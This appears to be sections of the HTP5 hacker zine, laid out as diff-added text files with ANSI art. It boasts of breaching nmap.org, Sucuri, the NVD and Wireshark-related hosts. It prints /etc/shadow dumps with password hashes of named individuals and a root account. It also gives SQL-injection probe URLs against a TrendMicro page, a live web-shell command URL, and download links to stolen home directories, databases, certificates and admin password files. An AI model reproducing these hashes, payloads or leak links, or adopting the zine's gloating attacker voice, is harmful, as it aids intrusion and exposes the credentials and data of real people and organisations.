+░▒▒░░░░▒▒▒▒▒░▒░░▒░░▓▓▓▓▓▓█▓▓▒░▒▒██▓██▓▒░░░░░░░▒░▒▒▒▓▓▓█████▓▒▒░                 
+▒▒▒▒▒▒░░░▒░▒▒▒▒░░▒▒▓▓▓▓▓▓████▒▒▒▒▓█████▓▒▒▒▒▒░░░▒░░▒▒▒▓████▒▒░░                 
+░▓▒▓▒▒▒▒░░░▒▒░▒▒░▒▓▓▓▓▓▓▓▓████▓▒░▓▓██▓█████▓▓▓▓▒▒▒▓▓▓▓███▓▒▒░░                  
+░▒▓▓▓▒▒▒▒▒▒▒░▒░▒▒▒▒▓▓▒░▓▓▒▓████▓░▒▓▓█████████████████████▓░░░░                  
+▒░▓░▓▒▒▒▒▒▒░▒░░▒▒▒▓▓▓▓▓░▒▒░▒▓███▓░░▒███████████████████▓░▒░▒░░                  
+▒▓▓▒▓░▒▒▒▒▒▒▒▒▒░░░░▒▓▓▓▓▓▓▓░▒▒▓██▒▒░▓██████████████████▒▒░▒░░░░                 
+▒█▓▓▒▒▒▒▒▒▒▒░▒▒░░▒▒░▒▓▓▓▓▓█▓▒▒▒▓██░▒▓▓████████████████▓▓▒░▒▒▒░░                 
+░▓░░▒░░▒▒▒▒▒▒▒▒░▒▒░▒▒▓▓▓▓████▓▓▓██▓░▓▓▓███████████████▓▓▓░▒░░▒░░                
+░░▒▒▒░▒░▒▒▒▒▒░▒▒░▒░░▒░▒▓▒▒████▓████▒░█▓███████████████▓▓█▒▒░░░░░░░              
+░░░░░░▒▒░░░▒▒▒▓▒▒▒▓░▒▒▒▓▓▓█▓▓▓██████░█▓▓██████████████▓██▓▒░░░░░▒░░             
+░░░░░░▒▒▒▒▒░░▒▒▒░▒▒▒▒░▒▓▓▓▓██▓▓▓▓███▒▓█▓██████████████▒██▓▒▒░▒░▒░▒░░            
+ ░░░░░░░░░░░░░░░░░░░░▒▒░░░░▒░░░▒░░▒▒▒▒▓▒▓▓▓██▓▓▓▓▓██▓█▓░▒▒░▒▒░░░░░▒▒░░          
+         ░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒░▒░▒▒░▒▒▒▒░░▒▒▒▒░░░░░▒▒░▒▒▓░░░▒▒░░        
+                   ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒░▒▒▒░░░░░░░░░▒▒░░       
+                                                              ░░░░░░░░░░        
+"You have to let it all go. Fear, doubt, and disbelief."                        
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+   ▄▄    ▄▄  ▄▄   ▄▄  ▄▄▄▄▄  ▄▄▄▄                                               
+   ███▄  ██  ██▀▄▀██  ██ ██  ██ ██                                          HTP5
+   ██ ▀█▄██  ██ ▀ ██  ██▀██  ██▀▀                                               
+   ██   ▀██  ██   ██  ██ ██  ██              Whoa. Did we just backdoor Trinity?
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+                                                                                
+Access to nmap.org (Insecure) was gained through Linode, which also included    
+svn.nmap.org and Seclists. Based on our approximations, the FBI went into holy- 
+shit mode beginning when we were backdooring it. We decided to withhold the     
+private releases, including DARPA CINDER Nmap, and release to you the unabridged
+contents of the /home/ directory including those of Fyodor (Gordon Lyon) and    
+David Fifield. Before we drop you into nmap.com, though, here's their           
+/etc/shadow for those curious:                                                  
+                                                                                
+[root@web etc]# cat shadow                                                      
+root:$1$9e0033fd$9M4AIYi9o1.wcm07WGUTZ0:14746:0:99999:7:::                      
+bin:*:14746:0:99999:7:::                                                        
+daemon:*:14746:0:99999:7:::                                                     
+adm:*:14746:0:99999:7:::                                                        
+lp:*:14746:0:99999:7:::                                                         
+sync:*:14746:0:99999:7:::                                                       
+shutdown:*:14746:0:99999:7:::                                                   
+halt:*:14746:0:99999:7:::                                                       
+mail:*:14746:0:99999:7:::                                                       
+news:*:14746:0:99999:7:::                                                       
+uucp:*:14746:0:99999:7:::                                                       
+operator:*:14746:0:99999:7:::                                                   
+games:*:14746:0:99999:7:::                                                      
+gopher:*:14746:0:99999:7:::                                                     
+ftp:*:14746:0:99999:7:::                                                        
+nobody:*:14746:0:99999:7:::                                                     
+vcsa:!!:14746:0:99999:7:::                                                      
+ntp:!!:14746::::::                                                              
+sshd:!!:14746::::::                                                             
+fyodor:$1$71vbn0Qa$34cy/K1mp8ag4C7I3eXqS/:14782:0:99999:7:::                    
+david:$1$cVie3LDG$WOrypVpCcBl.UyA8TKRX20:14783:0:99999:7:::                     
+xfs:!!:14782::::::                                                              
+apache:!!:14782::::::                                                           
+web:!!:14782:0:99999:7:::                                                       
+postfix:!!:14782::::::                                                          
+webalizer:!!:14783::::::                                                        
+mysql:!!:14896::::::                                                            
+postgres:!!:14897::::::                                                         
+distcache:!!:14924::::::                                                        
+pcap:!!:15615::::::                                                             
+mailman:!!:15666::::::                                                          
+                                                                                
+Yep, those are $1. We'll give them the benefit of the doubt: Linode used AES.   
+By the way, Fyodor, thanks for amis-6.01.DARPA1.tar.gz. We'll be sure to give it
+a spin.                                                                         
+                                                                                
+AMIS - Adversary Mission Identification System                                  
+==============================================                                  
+The Adversary Mission Identification System (AMIS) is a computer program        
+that analyzes logs of network scans and reports possible signs of an            
+adversary mission.                                                              
+The AMIS is designed to work with the logs produced by the Nmap Security        
+Scanner. It is part of an overall defensive system that includes                
+periodic scans and their analysis.                                              
+The AMIS checks for these "tells" that may be signs of an insider               
+mission:                                                                        
+* Newly opened ports, particularly those of file servers (e.g. HTTP,            
+  FTP, and P2P services).                                                       
+* Differences in files shared by known file servers, including new              
+  files, deleted files, and changes in file metadata.                           
+* Security vulnerabilities in servers.                                          
+                                                                                
+Enjoy this section of HTP5.                                                     
+                                                                                
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+~ http://mirror.hack-the-planet.tv/HTP-5/Nmap/home.tgz                           
+|- 16GB  | Nmap.org: /home/                                                     
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

htp/HTP5/0x04_Sucuri.txt

@@ -0,0 +1,110 @@
+   ▄▄▄▄▄▄▄▄  ▄▄  ▄▄  ▄▄▄▄▄  ▄▄  ▄▄  ▄▄▄▄▄ ▄▄▄▄▄▄▄▄                              
+   ██        ██  ██  ██     ██  ██  ██▄▄█    ██                             HTP5
+   ██▄▄▄▄▄▄  ██▄▄██  ██▄▄▄  ██▄▄██  ██ ▀▄▄▄▄▄██▄▄▄                              
+         ██                                                                     
+▄▄▄████████▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+                                                                                
+"Sucuri is a company that offers a security service that detects unauthorized   
+changes to network (cloud) assets, including web sites, DNS, Whois records, SSL 
+certificates and others. It is also heavily used as an early warning system to  
+detect Malware, Spam and other security issues on web sites and DNS hijacking." 
+                                                                                
+Sucuri, why didn't you announce that you got owned? Pretty useless warning      
+system, if you ask us.                                                          
+                                                                                
+[root@sucuri www]# uname -a                                                     
+Linux sucuri.net 2.6.39.1-linode34 #1 SMP Tue Jun 21 10:29:24 EDT 2011 i686 i686
+ i386 GNU/Linux                                                                 
+                                                                                
+2001, here we come                                                              
+[root@sucuri www]# cat /etc/shadow                                              
+root:iFvywDsrRwmjI:15755:0:99999:7:::                                           
+bin:*:14746:0:99999:7:::                                                        
+daemon:*:14746:0:99999:7:::                                                     
+adm:*:14746:0:99999:7:::                                                        
+lp:*:14746:0:99999:7:::                                                         
+sync:*:14746:0:99999:7:::                                                       
+shutdown:*:14746:0:99999:7:::                                                   
+halt:*:14746:0:99999:7:::                                                       
+mail:*:14746:0:99999:7:::                                                       
+news:*:14746:0:99999:7:::                                                       
+uucp:*:14746:0:99999:7:::                                                       
+operator:*:14746:0:99999:7:::                                                   
+games:*:14746:0:99999:7:::                                                      
+gopher:*:14746:0:99999:7:::                                                     
+ftp:*:14746:0:99999:7:::                                                        
+nobody:*:14746:0:99999:7:::                                                     
+vcsa:!!:14746:0:99999:7:::                                                      
+ntp:!!:14746::::::                                                              
+sshd:!!:14746::::::                                                             
+dre:mAuUxgVOcOeAE:15678:0:99999:7:::                                            
+apache:!!:14898::::::                                                           
+mysql:!!:14898::::::                                                            
+mailnull:!!:14946::::::                                                         
+smmsp:!!:14946::::::                                                            
+ossec:!!:15461:0:99999:7:::                                                     
+^ OSSEC? Here, We're sure you'll get a kick out of this:                        
+                                                                                
+TrendMicro (owns OSSEC) DB access via SQLi:                                     
+http://www.trendmicro.com/download/eula/agreement.asp?id=40993%20and%205=5      
+http://www.trendmicro.com/download/eula/agreement.asp?id=40993%20and%205=4      
+                                                                                
+Included in this segment of HTP5 are the databases of Sucuri's primary site,    
+though labs.sucuri.net and the rest of their VPS's were also compromised.       
+                                                                                
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+~ http://mirror.hack-the-planet.tv/HTP-5/Sucuri/dbs.tgz                         
+|- 2.1MB | Sucuri WP DB's                                                       
+▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
+"GREGORY D. EVANS, BABY! NUMBA 1!"                                              
+                                                                                
+                              ░░░▒▒▒▒░░░░░░░                                    
+                        ░░▒▒▒▒▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░                               
+                     ░▒▒▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒▒▒▒▒▒▒▒▒░░                           
+                   ░▒▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒▒▒▒▒▒▒▒░                         
+                ░▒▒▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒▒▒▓▓▒▒▒▒▒                       
+               ▒▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒░                     
+              ▒▒▒▒▒▒▒▒▒▒▒░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒▒                    
+             ▒▒▒▒▒▒▒▒░░░░░       ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▒▒                   
+            ▒▒▒▒▒▒▒░░░░░░          ░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒                  
+           ░▒▒▒▒▒▒░░░░░░░          ░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒                 
+           ▒▒▒▒▒▒▒░░░░░░░         ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓░                
+           ▒▒▒▒▒▒▒▒░░░░░░░░      ░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▒                
+          ░▒▒▒▒▒▒▒▒░░░░░░░░░      ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓░               
+           ▒▒▒▒▒▒▒░░░░░░   ░░    ░░░  ░░░▒▒▓▓▓▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓░               
+           ▒▒▒▒▒▒▒░░░░░░   ░░░░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▓▓▓▓▓▓▓▓░               
+           ░▒▒▓▓▒▒▒▒▒▒░░░░░░░░░░░▒▒▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒▒              
+           ░▒▓▓▓▓▓▓▓▓▓▓▒▒▒▒░░░░▒▒▓▓▓▓▓▓▒▒░▒▒▓▓▓▓▓▓▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▒             
+            ▓▓▓▒▓▓▓▓▓▓▓▓▓▓▒▒░░░░▒▓▓▓▓▓▓▒▓▄▓▓▓▓▓▓▓▒▒░░░▒▒▒▒▓▓▓▓▓▓▓▓▓░            
+            ▒▓▓▓▓▓░▒▒▓▓▓▓▓▓▒░  ░▒▒▒▒▒▒▒░░▒▒▒▒▓▓▒▒▒▒░░░▒▒▒▒▓▓▓▓▓▓▒▒▒░            
+            ▒▒▓▓▓▓▄▓▓▓░░▒▒▒▒░ ░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▒░▒░            
+            ▒▒▒▓▓▓▒▒▓▒▒░░▒▒▒░░░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▒▒▒░            
+             ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░░░░░░░░░     ░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▓░            
+             ▒▒▒▒▒▒▒░░░░▒▒░░░   ░░░░░▒▒▒▒░░     ░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓░ ▒             
+             ▒▒▒░░░░░░░░▒░░░░   ░░ ░░▒▒▓▒▒▒▒░░  ░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒             
+              ▒░░░░░░░░░▒▒▒▒▒░░▒▒▓▓▓▓▓▓░░░░▒▒░░░░░▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓             
+              ▒▒░░░░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▒░░░░▒▒▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒            
+              ▒▒▒▒▒░░░░░▒▓▓▓▓▓▓▓▒▓▒▒▒▒▒▒▒▒▓▓▓▓▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▒         
+               ▒▒▒▒▒▒░░▒▒▓▓▓▓▒▒▒░░░░░▒▒▒▒▒▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█████▓▓▒      
+                ▒▒▒▒▒▒▒▓▓▓▒▒▓▓▒▒▒░░░░░░▒▒▓▓▓▒▒▒▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒███████▓▓▒▒   
+                 ▓▓▓▓▓▓▓▓▓▓▓▓▓▒░       ░░▒▒▒░░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓░░▓█████████▓▓▓▒
+                  ▓▓▓▓▓▓▓▓▒▓▓▒▒░     ░░░░░░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓  ▒██████████████
+                   ▓▓▓▓▒▒▒▒▒▒▒░░░     ░░▒▒▒░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▒   ▓██████████████
+                    ▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓░   ░▓██████████████
+                      ▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓░     ▓▓██████████████
+                        ▓▓▓▓▒▒▒▒░░░░░░░░░░░▒▒▓▓▓▓█▓▓▓▓▓▓░      ▒▓███████████████
+                      ▓▓▓█▓▓▓▒▒▒▒░░░░░░░░▒▒▓▓▓▓▓█▓▓▓▓▒░       ░▓▓███████████████
+                  ▓▓▓███████▓▓▓▓▓▓▓▒▓▓▒▓▓▓▓▓▓██▓▓▓▓▒         ░▓▓████████████████
+               ▓▓████████████▒▒▓▓▓▓▓▓▓▓▓▓████▓▓▓▒░           ▓▓█████████████████
+           ▓▓▓███████████████▓  ░▒▓▓▓██████▓▓▓▒             ▓▓██████████████████
+       ▓▓▓████████████████████▒     ░▒▓▓▓██▓▒              ▓▓███████████████████
+    ▓▓▓███████████████████████▓░        ░▓▒               ▒▓▓███████████████████
+▓▓▓▓███████████████████████████▒        ▓▓▓              ▒▓█████████████████████
+▓██████████████████████████████▓░      ▓▓▓▓▒            ░▓▓█████████████████████
+███████████████████████████████▓░     ▓▓▓▓▓░▓░          ▓▓▓█████████████████████
+███████████████████████████████▓     ░▓▓▒▒▓▒▓▓▒        ▓▓▓██████████████████████
+███████████████████████████████░     ▒▓▒▒░▓▓▓░        ▒▓▓███████████████████████
+███████████████████████████████▒     ▓▓▒░░▓▓░        ░▓▓████████████████████████
+███████████████████████████████▒    ░▒▒▒▓▓▓▓▒       ░▓▓█████████████████████████
+██████████████████████████████▓▓    ░▒▓▒▓▓▓▒▒▒      ▓▓██████████████████████████
+▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀

htp/HTP5/0x05_NVD.txt

@@ -0,0 +1,95 @@
+   ▄▄    ▄▄  ▄  ▄▄▄▄  ▄▄▄▄▄       ▄▄    ▄▄  ▄   ▄  ▄▄▄                          
+   ███▄  ██  █  █▄▄▄    █    ▄▄▄  ███▄  ██  █   █  █  █                     HTP5
+   ██ ▀█▄██  █  ▄▄▄█    █         ██ ▀█▄██   ▀▄▀   █▄▄▀                         
+   ██   ▀██                       ██   ▀██                                      
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+                                                                                
+                    GILL                                                        
+       However, we have come to believe that one 'HTP'                          
+       is involved in the NVD breach. They or perhaps                           
+       an accomplice of theirs have a disk that Mr.                             
+       Belford needs. We want you to help us find it.                           
+                                                                                
+                        \                                                       
+                                                                                
+                              ░░▒▒▓▓▓▓▓▓▓▓▓▒▒░░                                 
+                          ░▒▓███████████████████▓▒░                             
+                       ░▒▓█████████████████████████▓▒░                          
+                     ░▓████████▓▓▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓█████▓                         
+                    ░▓█████▓▓▓▓▒▒▒░░░░░░░░░░▒▒▒▒▒▓▓▓███▓                        
+                   ░▓████▓▓▓▒▒▒▒▒▒▒░░░░     ░░░░░▒▒▓▓▓██▓                       
+                   ▓████▓▓▒▒▒▒▒▒░░░░           ░░▒▒▒▓▓▓██▒                      
+                  ▒████▓▓▓▒▒▒▒▒░░░               ░▒▒▒▓▓▓██                      
+                  ▓████▓▓▒▒▒▒▒▒░░░               ░░▒▒▒▓▓▓█░                     
+                  █████▓▓▒▒▒▒▒░░░                 ░░▒▒▒▓▓█▒                     
+                  ████▓▓▒▒▒▒▒▒▒▒▒░░              ░░▒▒▒▒▓▓▓▓                     
+                  ███▓▓▒▒▒▒▒▒▒░░░               ░░░░▒▒▒▓▓▓▓                     
+                  ▓█▓▓▓▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▄░   ░▄▓▓▓▓▓▓▓▓▓█▓▓▓                     
+                  ▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓▓▓▓█▒▓▒▓▒▓▓▓▓▓▓▓▓▓▓█▓█░                    
+                  ▒▓▓▓▓▒▒░░▒█▓▓▓▓▓▓▓▓▓▓█░▒░░▒▓▓▓▓▓▓▓▓▓▓▓█▓▓                     
+                 ░▒▓▓▒▒▒▒░░▒▒█▓▓▓▓▓▓▓▓▓█░▒░░░▒▓▓▓▓▓▓▓▓▓▓█▒▓░                    
+                 ▒▒▒▒▒▒▒▒▒▒▒░░▀▀▀▀▀▀▀ ░▒░░   ░▒▒▒▀▀▀▀▀▀▒▓▓▓▒                    
+                 ░▒▒▒▒▒▒▒▒▒░░         ░░░     ░░▒    ░░▒▒▒▓                     
+                 ▒▒▒▒▒▒▒▒▒▒▒░         ░░░░░   ░░░░░    ░░▒▓▒                    
+                  ░▒▒▒▒▒▒▒▒▒░         ░░░░░  ░▒░░░     ░▒▒▓                     
+                  ░▒▒▒▒▒▒▒▒░░░░  ░░░░▒▒▒▒░░░░░▓▓▒░░  ░░░▒▓▓                     
+                  ░░▒▒▒▒▒▒░░░░░░▒▒▓▒░░░░░░░░░░░▒▓▓▓▒░░▒▒▓▓▓░                    
+                  ░▓▒▒▒▒▒░░░░░░░▒▓▓▒░░░       ░░▒▓▓▓▓▒▒▒▓▒▓░                    
+                   ▓▓▓▒▒▒▒░░░░░░▒▓▒░░ ░░░░  ░░░░░▒▒▓▓▒▒▒▒▒▓                     
+                    ▓▓▓▓▒▒▒░░░▒▒▒▒░ ░░▒▒▓▒▒▒▒▒░░▒▒▒▒▓▒▒▒▒▓▒                     
+                    ▓▓▓▓▓▒▒▒▒▒▒▒▓▒   ░░░░░░░░ ░▒▒▒░░▒▓▒▒▓▓                      
+                    ▒▓▓▓▓▓▒▒▒▒▒▒▓▒░░░░   ░░░░░░░▒▒▒▒▓▓▒▓▓▒                      
+                   ░░▒▒▓▓▓▓▒▒▒▒▒▒▓▒░░░        ░░▒▒▓▓▓▓▓▓▓                       
+                   ░  ▒▒▓▓▓▓▒▒▒▒▒▓▓▒▒░░░     ░░▒▒▒▒▓▓▓▓▒▓                       
+                  ░▒   ░▒▒▓▓▓▓▒▒▒▒▓▓▒▒▒░    ░▒▒▒▓▓▒▓█▓▒ ░░                      
+                 ░██░    ░▒▒▓▓▓▓▒▒▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▒▓▓▓▓▒  ░                      
+                ▒████░      ░▒▒▓▓▓▒▒▓▓▓███████▓▓▓▓▓▓▓▓▒   ▓▒░                   
+              ▒▓██████▒        ░▒▒▓▓▓▓▓▓▓█▓▓▓██▓▓▓▓▓▒▒▒   ▓███▓▓▒▒░░            
+          ░▒▓██████████▓          ░░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒   ░██████████▓▓▓▒▒░░    
+      ░▒▓███████████████▓             ░░░░▒▒▒▒▒▒▒▒░░▒░     ▒█████████████████▓▓▒
+ ░▒▓▓████████████████████▓░              ▓▓▓▓░▓▓▓░░░        ████████████████████
+██████████████████████████▓░              ▓▓▓▓▓▓░           ▒███████████████████
+████████████████████████████▒               ▓▓██             ▓██████████████████
+█████████████████████████████▒               ████            ░██████████████████
+██████████████████████████████▒              ▀████            ▒█████████████████
+███████████████████████████████▓              █████            █████████████████
+████████████████████████████████▓             ██████           ▒████████████████
+█████████████████████████████████▓            ███████           ▓███████████████
+██████████████████████████████████▓░          ████████          ░▓██████████████
+████████████████████████████████████░         ▓████████          ▒██████████████
+█████████████████████████████████████░        █████████           ██████████████
+██████████████████████████████████████▒        █████████          ▓█████████████
+███████████████████████████████████████▒       ██████████         ░█████████████
+████████████████████████████████████████▓      ▒██████████         ▓████████████
+▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
+                                                                                
+About 8 months ago, we were monitoring our intel (tail -f'ing PM logs from other
+networks) and came across an individual who was pretty skilled with ColdFusion. 
+After due time, we invited him/her to HTP. He/she ended up manifesting the NULL 
+RDS 1day POC, which owned the NVD.                                              
+                                                                                
+The NVD realized they were breached, and deleted the shells. Soon after, they   
+were shelled again. They deleted the shells again. Once again, they were        
+shelled. The DHS CSD was swift and unrelenting with their execution of the      
+DELETE key.                                                                     
+                                                                                
+As fun as this was, the rest of HTP acknowledged what had been breached. We     
+switched tactics and proceeded to traverse the National Vulnerability Database  
+network. Two boxes down, we downloaded the CFM scripts and certificates hosted  
+within the NVD and NISTWEB servers. From them, we were able to authenticate     
+ourselves to access the DHS NIST/NVD user database (root slash period workspace 
+slash period garbage period).                                                   
+                                                                                
+Not knowing what to do, and realizing their DELETE key training had abandoned   
+them, the DHS CSD resorted to shutting the entire site down. It is our theory   
+their inspiration for this technique came from an NCIS episode:                 
+http://www.youtube.com/watch?v=u8qgehH3kEQ                                      
+                                                                                
+Included in this segment of HTP5 is the DHS NIST/NVD user database, along with  
+two certificates and their ColdFusion admin password.properties. Enjoy.         
+                                                                                
+                                                                                
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+~ http://mirror.hack-the-planet.tv/HTP-5/NVD/NVD.zip                            
+|- 0MB | DHS NIST/NVD user database, two certs, CF admin password.properties    
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

htp/HTP5/0x06_Wireshark.txt

@@ -0,0 +1,69 @@
+███    ███        ▄████  ▄▄████▄▄  ███    ███  
+███    ███       ▄█████ ▄██▀  ▀██▄ ███   ███   
+███    ███      ▄██▀███ ███    ███ ███  ███    
+██████████     ▄██▀ ███ ███        ███▄███                        W
+███    ███    ▄██▀  ███ ███        ████████                       I
+███    ███   ▄██▀   ███ ███    ███ ███  ████                      R
+███    ███  ▄██████████ ▀██▄  ▄██▀ ███   ████                     E
+███    ███ ▄██▀     ███  ▀▀████▀▀  ███    ████                    S
+                                                                  H
+                                                                  A
+                                         _____                    R
+███████████ ███    ███ ██████████     ,-:` \;',`'-                K
+    ███     ███    ███ ███          .'-;_,;  ':-;_,'.             
+    ███     ███    ███ ███         /;   '/    ,  _`.-\  
+    ███     ██████████ ███████    | '`. (`     /` ` \`|       
+    ███     ███    ███ ███        |:.  `\`-.   \_   / |      
+    ███     ███    ███ ███        |     (   `,  .`\ ;'|     
+    ███     ███    ███ ███         \     | .'     `-'/    
+    ███     ███    ███ ██████████   `.   ;/        .'
+                                      `'-._____.-'`   
+                                      
+                                      
+███████▄▄  ███             ▄████ ███▄    ███ ██████████ ███████████  /""-._
+███   ▀██▄ ███            ▄█████ ████▄   ███ ███            ███     .      '-,
+███    ███ ███           ▄██▀███ █████▄  ███ ███            ███     :         '',
+███   ▄██▀ ███          ▄██▀ ███ ███▀██▄ ███ ███████        ███     ;      *     '.
+███████▀▀  ███         ▄██▀  ███ ███ ▀██▄███ ███            ███     ' *         () '.
+███        ███        ▄██▀   ███ ███  ▀█████ ███            ███      \               \
+███        ███       ▄██████████ ███   ▀████ ███            ███       \      _.---.._ '.
+███        ████████ ▄██▀     ███ ███    ▀███ ██████████     ███        :  .' _.--''-''  \ ,'
+                                                         .._            '/.'             . ;
+                                                          ; `-.          ,                \'
+                                                           ;   `,         ;              ._\
+                                                            ;    \     _,-'                ''--._
+                                                             :    \_,-'                          '-._
+                                                              \ ,-'                       .          '-._
+                                                             .'         __.-'';            \...,__       '.
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   0x06   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄.'      _,-'       \              \   ''--.,__ '\
+                                                           /   _,--' ;          \             ;           "^.}
+For the final segment of HTP5, we present: Wireshark.     ;_,-' )     \  )\      )            ;
+                                                               /       \/  \_.,-'             ;
+Debian, Python, Wireshark, Mercurial, MoinMoin, and Wget      /                              ;
+were all compromised by moinmelt.py, our RXE 0day for      ,-'  _,-'''-.    ,-.,            ;       
+MoinMoin (included in HTP5). Hell, Wget is still        ,-' _.-'        \  /    |/'-._...--'
+shelled. Would someone please update them? It's been   :--``             )/
+months by now:                                                    
+                                                                  
+http://wget.addictivecode.org/Wget?action=moinexec&c=uname%20-a   
+                                                                  
+We had our sights set on backdooring Mercurial, which             
+would land us shells on UnrealIRCd (3rd time!), Firefox,          
